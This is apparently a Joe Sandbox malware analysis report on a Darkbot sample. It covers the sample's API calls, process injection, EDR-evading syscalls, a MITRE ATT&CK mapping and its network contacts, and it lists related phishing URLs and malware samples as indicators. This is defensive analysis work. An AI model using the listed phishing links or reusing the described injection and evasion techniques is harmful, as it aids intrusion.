            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,30_2_0009B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,31_2_0091B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,32_2_0039B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,33_2_0009B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,34_2_0022B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,35_2_0015B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,36_2_007FB480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,37_2_0025B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,38_2_0026B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,39_2_003FB480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,40_2_003FB480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,41_2_0028B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,42_2_0010B480
            Source: C:\Users\user\Desktop\25F.tmp.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_0036E880 memset,lstrlenA,_snprintf,CreateNamedPipeA,CreateNamedPipeA,CloseHandle,ConnectNamedPipe,GetLastError,CreateThread,CloseHandle,CreateNamedPipeA,4_2_0036E880
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_00361AD0 GetSystemTimeAsFileTime,4_2_00361AD0
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 0_2_00604C91 GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId,0_2_00604C91
            Source: C:\Users\user\Desktop\25F.tmp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure1
            Replication Through Removable Media            		31
            Native API            		2
            Bootkit            		1
            Access Token Manipulation            		1
            Masquerading            		1
            Credential API Hooking            		1
            System Time Discovery            		Remote Services1
            Credential API Hooking            		21
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            DLL Side-Loading            		713
            Process Injection            		11
            Virtualization/Sandbox Evasion            		LSASS Memory11
            Security Software Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            Abuse Elevation Control Mechanism            		1
            Access Token Manipulation            		Security Account Manager11
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Browser Session Hijacking            		2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            DLL Side-Loading            		713
            Process Injection            		NTDS2
            Process Discovery            		Distributed Component Object ModelInput Capture3
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets11
            Peripheral Device Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism            		Cached Domain Credentials3
            File and Directory Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Obfuscated Files or Information            		DCSync125
            System Information Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
            Bootkit            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Software Packing            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
            DLL Side-Loading            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1582673 Sample: 25F.tmp.exe Startdate: 31/12/2024 Architecture: WINDOWS Score: 100 49 Antivirus / Scanner detection for submitted sample 2->49 51 Yara detected Darkbot 2->51 53 Machine Learning detection for sample 2->53 55 4 other signatures 2->55 10 25F.tmp.exe 2->10         started        process3 signatures4 61 Detected unpacking (creates a PE file in dynamic memory) 10->61 63 Found evasive API chain (may stop execution after checking mutex) 10->63 65 Found evasive API chain (may stop execution after checking system information) 10->65 67 7 other signatures 10->67 13 25F.tmp.exe 1 10->13         started        process5 signatures6 69 Injects a PE file into a foreign processes 13->69 16 25F.tmp.exe 3 13->16         started        19 notepad.exe 13->19         started        process7 signatures8 41 Changes memory attributes in foreign processes to executable or writable 16->41 43 Writes to foreign memory regions 16->43 45 Allocates memory in foreign processes 16->45 47 2 other signatures 16->47 21 QgGhoOpxHPl.exe 16->21 injected 24 QgGhoOpxHPl.exe 16->24 injected 26 WmiPrvSE.exe 16->26 injected 28 31 other processes 16->28 process9 signatures10 57 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 21->57 59 Found direct / indirect Syscall (likely to bypass EDR) 21->59 30 iexplore.exe 9 45 28->30         started        process11 process12 32 iexplore.exe 49 30->32         started        dnsIp13 35 code.jquery.com 151.101.2.137, 443, 49180, 49181 FASTLYUS United States 32->35 37 sb.scorecardresearch.com 18.244.18.38, 443, 49174, 49175 AMAZON-02US United States 32->37 39 4 other IPs or domains 32->39

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            25F.tmp.exe100%AviraTR/Injector.VS
            25F.tmp.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            No Antivirus matches

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            code.jquery.com
            		151.101.2.137
            		truefalse
              		high
              sb.scorecardresearch.com
              		18.244.18.38
              		truefalse
                		high
                assets.msn.com
                		unknown
                		unknownfalse
                  		high
                  www.msn.com
                  		unknown
                  		unknownfalse
                    		high
                    c.msn.com
                    		unknown
                    		unknownfalse
                      		high
                      browser.events.data.msn.com
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://sb.scorecardresearch.com/b2?rn=1735632299605&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=0B7EB9A71D6D654F0B8CACC11CC56471&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*nullfalse
                          		high
                          https://code.jquery.com/jquery-3.6.3.min.jsfalse
                            		high
                            https://sb.scorecardresearch.com/b?rn=1735632299605&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=0B7EB9A71D6D654F0B8CACC11CC56471&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*nullfalse
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://www.msn.com/?ocid=iehp{E68EA6F6-C74D-11EF-8F38-ECF4BBB5915B}.dat.6.dr, ~DF854EA4F5FD60E78B.TMP.6.drfalse
                                		high
                                http://api.wipmania.com/QgGhoOpxHPl.exe, 0000002A.00000002.620410514.0000000000100000.00000040.00000400.00020000.00000000.sdmpfalse
                                  		high
                                  https://assets.msn.com/bundles/v1/homePage/latest/midlevel/vendors.290823e0e7160e8e5303.jsYJ1BHFNR.htm.24.drfalse
                                    		high
                                    https://assets.msn.com/bundles/v1/homePage/latest/midlevel/common.802715d7a736bd82fc74.jsYJ1BHFNR.htm.24.drfalse
                                      		high
                                      https://assets.msn.com/bundles/v1/homePage/latest/midlevel/microsoft.b109cceab5e009228460.jsYJ1BHFNR.htm.24.drfalse
                                        		high
                                        https://www.msn.com/fr-ch/actualite/other/Mentions-lexperience.b374b0d5b40196862f17[1].js.24.drfalse
                                          		high
                                          https://www.msn.com/favicon.icoimagestore.dat.24.drfalse
                                            		high

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            151.101.2.137
                                            		code.jquery.comUnited States
                                            		54113FASTLYUSfalse
                                            18.244.18.38
                                            		sb.scorecardresearch.comUnited States
                                            		16509AMAZON-02USfalse

                                            General Information

                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1582673
                                            Start date and time:2024-12-31 09:03:44 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 9m 23s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                            Number of analysed new started processes analysed:10
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:33
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:25F.tmp.exe
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@13/38@6/2
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 57
                                            • Number of non-executed functions: 400
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe

                                            Warnings

                                            • Exclude process from analysis (whitelisted): dllhost.exe
                                            • Excluded IPs from analysis (whitelisted): 184.28.89.167, 204.79.197.203, 23.72.248.199, 23.72.248.211, 23.72.248.200, 23.72.248.206, 23.72.248.210, 23.72.248.201, 23.72.248.204, 23.72.248.198, 23.72.248.207, 13.107.5.80, 2.22.251.24, 2.22.251.30, 2.22.251.41, 2.22.251.22, 2.22.251.42, 2.22.251.23, 2.22.251.40, 2.22.251.35, 2.22.251.25, 184.86.251.19, 184.86.251.9, 184.86.251.21, 184.86.251.22, 184.86.251.27, 184.86.251.7, 184.86.251.13, 184.86.251.20, 13.74.129.1, 20.42.65.85, 13.107.21.237, 204.79.197.237, 152.199.19.161
                                            • Excluded domains from analysis (whitelisted): www.bing.com, assets.msn.com.edgekey.net, c-msn-com-nsatc.trafficmanager.net, c-bing-com.dual-a-0034.a-msedge.net, ie9comview.vo.msecnd.net, api.bing.com, a-0003.a-msedge.net, onedscolprdeus05.eastus.cloudapp.azure.com, www-msn-com.a-0003.a-msedge.net, r20swj13mr.microsoft.com, www-www.bing.com.trafficmanager.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, e-0001.e-msedge.net, go.microsoft.com, e86303.dscx.akamaiedge.net, www.bing.com.edgekey.net, c.bing.com, go.microsoft.com.edgekey.net, dual-a-0034.a-msedge.net, global.asimov.events.data.trafficmanager.net, e28578.d.akamaiedge.net, api-bing-com.e-0001.e-msedge.net, cs9.wpc.v0cdn.net
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            03:04:47API Interceptor87x Sleep call for process: 25F.tmp.exe modified
                                            03:04:50API Interceptor12328x Sleep call for process: QgGhoOpxHPl.exe modified
                                            03:05:17API Interceptor1x Sleep call for process: WmiPrvSE.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            151.101.2.137http://novo.oratoriomariano.com/novo/Get hashmaliciousUnknownBrowse
                                            • code.jquery.com/jquery-3.3.1.min.js
                                            http://facebooksecurity.blogspot.dk/Get hashmaliciousUnknownBrowse
                                            • code.jquery.com/jquery-1.7.min.js
                                            http://soporte-store.info/icloud2022-esp.phpGet hashmaliciousUnknownBrowse
                                            • code.jquery.com/jquery-1.11.3.min.js
                                            http://applela.za.com/isignesp.php?id=Get hashmaliciousUnknownBrowse
                                            • code.jquery.com/jquery-1.11.3.min.js
                                            http://www.oodlesoftraffic.com/ec/JaneMarksHealth/1934/acmariix2/Get hashmaliciousUnknownBrowse
                                            • code.jquery.com/jquery-1.9.1.js
                                            http://awqffg.newburuan2023.biz.id/next.phpGet hashmaliciousHTMLPhisherBrowse
                                            • code.jquery.com/jquery-1.10.2.min.js
                                            18.244.18.38WSock.dllGet hashmaliciousRamnitBrowse
                                              Unlock_Tool_v2.6.5.exeGet hashmaliciousStealc, VidarBrowse
                                                file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                        file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                          ArenaWarsSetup.exeGet hashmaliciousUnknownBrowse
                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse

                                                                Domains

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                code.jquery.comhttps://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.comGet hashmaliciousHTMLPhisherBrowse
                                                                • 151.101.130.137
                                                                https://N0.kolivane.ru/da4scmQ/#Memily.gamble@amd.comGet hashmaliciousUnknownBrowse
                                                                • 151.101.2.137
                                                                EFT Payment_Transcript__Survitecgroup.htmlGet hashmaliciousUnknownBrowse
                                                                • 151.101.2.137
                                                                http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=hGet hashmaliciousHTMLPhisherBrowse
                                                                • 151.101.66.137
                                                                Hwacaj.exeGet hashmaliciousDarkbotBrowse
                                                                • 151.101.66.137
                                                                http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=hGet hashmaliciousHTMLPhisherBrowse
                                                                • 151.101.66.137
                                                                http://customervoice.microsoft.com/Pages/ResponsePage.aspx?id=N_pyUL0QJkeR_KiXHZsVlyTB1Qoy7S9IkE8Ogzl8coFUMFBJSDkxQ0w3VVZMNFJFUlNDRVkyU05CUi4uGet hashmaliciousHTMLPhisherBrowse
                                                                • 151.101.130.137
                                                                phish_alert_iocp_v1.4.48 - 2024-12-26T092852.527.emlGet hashmaliciousUnknownBrowse
                                                                • 151.101.2.137
                                                                https://contractnerds.com/Get hashmaliciousUnknownBrowse
                                                                • 151.101.194.137
                                                                http://booking.extranetguests.com/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                • 151.101.194.137
                                                                sb.scorecardresearch.comBHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                                                • 18.244.18.122
                                                                Tool_Unlock_v1.2.exeGet hashmaliciousVidarBrowse
                                                                • 18.161.69.30
                                                                Hwacaj.exeGet hashmaliciousDarkbotBrowse
                                                                • 18.161.69.8
                                                                JA7cOAGHym.exeGet hashmaliciousVidarBrowse
                                                                • 18.161.69.117
                                                                aD7D9fkpII.exeGet hashmaliciousVidarBrowse
                                                                • 18.165.220.110
                                                                installer.batGet hashmaliciousVidarBrowse
                                                                • 18.165.220.106
                                                                skript.batGet hashmaliciousVidarBrowse
                                                                • 18.165.220.66
                                                                din.exeGet hashmaliciousVidarBrowse
                                                                • 18.165.220.66
                                                                lem.exeGet hashmaliciousVidarBrowse
                                                                • 18.165.220.57
                                                                HVlonDQpuI.exeGet hashmaliciousVidarBrowse
                                                                • 18.244.18.32

                                                                ASNs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                AMAZON-02USchernobyl.arm7.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                • 54.171.230.55
                                                                DIS_37745672.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                                                • 34.241.139.243
                                                                ARMV7L.elfGet hashmaliciousMiraiBrowse
                                                                • 54.247.62.1
                                                                systempreter.exeGet hashmaliciousAsyncRATBrowse
                                                                • 3.69.157.220
                                                                http://ghostbin.cafe24.com/Get hashmaliciousUnknownBrowse
                                                                • 13.32.99.103
                                                                rjnven64.elfGet hashmaliciousMiraiBrowse
                                                                • 54.171.230.55
                                                                https://gogl.to/3HGTGet hashmaliciousCAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRATBrowse
                                                                • 18.245.31.129
                                                                Epsilon.exeGet hashmaliciousUnknownBrowse
                                                                • 185.166.143.48
                                                                boatnet.arm6.elfGet hashmaliciousMiraiBrowse
                                                                • 34.249.145.219
                                                                kwari.arm.elfGet hashmaliciousUnknownBrowse
                                                                • 54.168.12.166
                                                                FASTLYUShttps://gogl.to/3HGTGet hashmaliciousCAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRATBrowse
                                                                • 199.232.214.172
                                                                Epsilon.exeGet hashmaliciousUnknownBrowse
                                                                • 185.199.111.133
                                                                https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.comGet hashmaliciousHTMLPhisherBrowse
                                                                • 151.101.194.137
                                                                https://employeeportal.net-login.com/XL0pFWEloTnBYUmM5TnBUSmVpbWxiSUpWb3BBL1lPY1hwYU5uYktNWkd5ME82bWJMcUhoRklFUWJiVmFOUi9uUS81dGZ4dnJZYkltK2NMZG5BV1pmbFhqMXNZcm1QeXBXTXI4R090NHo5NWhuL2l4TXdxNlY4VlZxWHVPNTdnc1M3aU4xWjhFTmJiTEJWVUYydWVqZjNPbnFkM3M5T0FNQ2lRL3EySjhvdVVDNzZ2UHJQb0xQdlhZbTZRPT0tLTJaT0Z2TlJ3S0NMTTZjc2ktLTZGNUIwRnVkbFRTTHR2dUFITkcxVFE9PQ==?cid=2341891188Get hashmaliciousKnowBe4Browse
                                                                • 199.232.192.193
                                                                https://tepco-jp-lin;.%5Dshop/co/tepcoGet hashmaliciousUnknownBrowse
                                                                • 199.232.188.157
                                                                eXbhgU9.exeGet hashmaliciousLummaCBrowse
                                                                • 185.199.110.133
                                                                Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                • 185.199.108.133
                                                                Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                • 185.199.108.133
                                                                Supplier.batGet hashmaliciousUnknownBrowse
                                                                • 185.199.110.133
                                                                Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                • 185.199.111.133

                                                                JA3 Fingerprints

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                7dcce5b76c8b17472d024758970a406bHwacaj.exeGet hashmaliciousDarkbotBrowse
                                                                • 151.101.2.137
                                                                • 18.244.18.38
                                                                Archivo-PxFkiLTWYG-23122024095010.htaGet hashmaliciousUnknownBrowse
                                                                • 151.101.2.137
                                                                • 18.244.18.38
                                                                Pago.xlsGet hashmaliciousAveMaria, UACMeBrowse
                                                                • 151.101.2.137
                                                                • 18.244.18.38
                                                                NB PO-104105107108.xlsGet hashmaliciousUnknownBrowse
                                                                • 151.101.2.137
                                                                • 18.244.18.38
                                                                PyrNUtAUkw.docxGet hashmaliciousUnknownBrowse
                                                                • 151.101.2.137
                                                                • 18.244.18.38
                                                                SLNA_Updated_Medical_Grant_Application(1).docxGet hashmaliciousUnknownBrowse
                                                                • 151.101.2.137
                                                                • 18.244.18.38
                                                                CMR ART009.docxGet hashmaliciousUnknownBrowse
                                                                • 151.101.2.137
                                                                • 18.244.18.38
                                                                Cot90012ARCACONTAL.xlsGet hashmaliciousRemcosBrowse
                                                                • 151.101.2.137
                                                                • 18.244.18.38
                                                                Estado.de.cuenta.xlsGet hashmaliciousAveMaria, UACMeBrowse
                                                                • 151.101.2.137
                                                                • 18.244.18.38
                                                                SOA USD67,353.35.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                • 151.101.2.137
                                                                • 18.244.18.38

                                                                Dropped Files

                                                                No context

                                                                Created / dropped Files

                                                                C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico

                                                                Download File
                                                                Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                Category:dropped
                                                                Size (bytes):4286
                                                                Entropy (8bit):3.8046022951415335
                                                                Encrypted:false
